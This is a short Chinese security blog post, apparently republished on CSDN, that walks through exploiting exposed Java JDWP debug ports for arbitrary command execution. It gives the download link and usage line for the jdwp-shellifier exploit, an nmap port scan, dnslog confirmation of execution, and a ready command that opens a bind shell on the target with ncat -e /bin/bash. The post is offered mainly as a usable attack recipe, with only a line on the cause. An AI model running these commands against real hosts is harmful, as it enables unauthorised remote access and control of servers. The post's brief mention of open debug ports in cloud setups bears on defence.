java JDWP调试接口任意命令执行漏洞

293ea7bcc824d27fd1cf2f40156e83f9.gif

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维fa2636fba406232c3941429321a3b273.png

让我们每天进步一点点

简介

JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息,该漏洞可以被黑帽子直接利用进行非法活动。

22ed9b9bdd4799dec4124df38639ddb3.png实战

下载exp:

https://github.com/IOActive/jdwp-shellifier

使用方法:

python jdwp-shellifier.py -t 目标主机ip -p jdwp运行端口 --cmd "Your Command"

使用nmap扫描目标nmap -sV -p 1-65535 目标ip  发现端口2424使用java Debug

46b684c37891531541fbc2953cb8cd6f.png

开启一个dnslog来确认命令执行

211c0935328673fabae5fc79e8afbd4c.png

使用exp进行命令注入

ac3467d759046b434f7257639e448c98.png

查看dnslog 发现命令已经执行成功

6f52b7f0530036ddf9ac7873086502ab.png

当然也可以直接开启一个后门使用nc进行连接

python jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "ncat -lvvp 1234 -e /bin/bash"

这个漏洞经常出现在云环境部署后开发人员粗心大意没有关闭调试接口或者没有配置访问控制的情况下。漏洞原理啥的就不啰嗦了。

往期内容

灭世之Apache Log4j2 远程代码执行漏洞

CFT学习资源与工具上新

工具篇-BurpSutie Pro 2021.10.1最新版本

327f942b1e2cead93299d412c2a78797.gif

37590f685828786045410d4dea972024.gif

更多资讯长按二维码 关注我们

觉得不错点个“赞”呗c4e3cbbbed909e5c116cd9a61e15ab80.png      

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值